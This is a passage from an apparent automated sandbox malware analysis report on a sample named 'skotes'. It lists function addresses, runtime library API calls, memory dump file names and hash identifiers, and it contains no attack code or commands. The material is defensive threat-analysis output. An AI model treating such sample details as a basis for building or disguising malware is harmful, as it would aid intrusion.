                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3403738998-0
                                                                                                                                              • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                              • Instruction ID: 579499c82c18d5a5ade90e723c63f8c40f3c28f02b2f1580fedc01109288aa91
                                                                                                                                              • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                              • Instruction Fuzzy Hash: 9C516170B00229ABDB04DF65D495BEEB7A8FF08304F45406EE915EB381DB78AE45CB94
                                                                                                                                              Function 004352A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 004353A0
                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 004353C7
                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 004354D3
                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 004355AE
                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00435650
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                              • API String ID: 4162181273-393685449
                                                                                                                                              • Opcode ID: a333619f4898329af32b3d93ce64bfd70127bcb43ac65579a31d58dbbafa8e18
                                                                                                                                              • Instruction ID: 7946f23dea792be26d4820a62e4550dff79cbb7357508b3bf55c7f92dc133849
                                                                                                                                              • Opcode Fuzzy Hash: a333619f4898329af32b3d93ce64bfd70127bcb43ac65579a31d58dbbafa8e18
                                                                                                                                              • Instruction Fuzzy Hash: C3C1AA71800609EFCF19DF95C881AAEBBB5BF1C315F04615BE8156B206C338EA51CF99
                                                                                                                                              Function 00434840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00434877
                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0043487F
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00434908
                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00434933
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00434988
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                              • String ID: S9C$csm
                                                                                                                                              • API String ID: 1170836740-582408667
                                                                                                                                              • Opcode ID: f50a35cc9b0cd1d54b3ada07bdb3590510d73737303dcd081f3ff4d5673c6e04
                                                                                                                                              • Instruction ID: 6575625a84691e9b1f9b7e8611f910fc559112cced3487189da3a48804891882
                                                                                                                                              • Opcode Fuzzy Hash: f50a35cc9b0cd1d54b3ada07bdb3590510d73737303dcd081f3ff4d5673c6e04
                                                                                                                                              • Instruction Fuzzy Hash: 7141E874A00208ABCF10DF69C844ADF7BB4BF89318F14815BE8149B392D779EA11CF99
                                                                                                                                              Function 00427364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273B0
                                                                                                                                              • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273F2
                                                                                                                                              • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042740E
                                                                                                                                              • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427419
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427440
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: count$ppVirtualProcessorRoots
                                                                                                                                              • API String ID: 3897347962-3650809737
                                                                                                                                              • Opcode ID: 458ac73997a2f70f37004ddd16129de3859d25f13cf3a168d1a694e5b8c776cb
                                                                                                                                              • Instruction ID: 910b0151320ec7fd7557316ad521234f334c06ab70371bbe18cdfb5d61862d5e
                                                                                                                                              • Opcode Fuzzy Hash: 458ac73997a2f70f37004ddd16129de3859d25f13cf3a168d1a694e5b8c776cb
                                                                                                                                              • Instruction Fuzzy Hash: A8219334B00229EFCB10EF55D485AAEBBB5BF09344F54406AEC0197351CB38AE05CB98
                                                                                                                                              Function 0041EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _SpinWait.LIBCONCRT ref: 0041EEBC
                                                                                                                                              • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EEC8
                                                                                                                                              • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EEE1
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EF0F
                                                                                                                                              • Concurrency::Context::Block.LIBCONCRT ref: 0041EF31
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
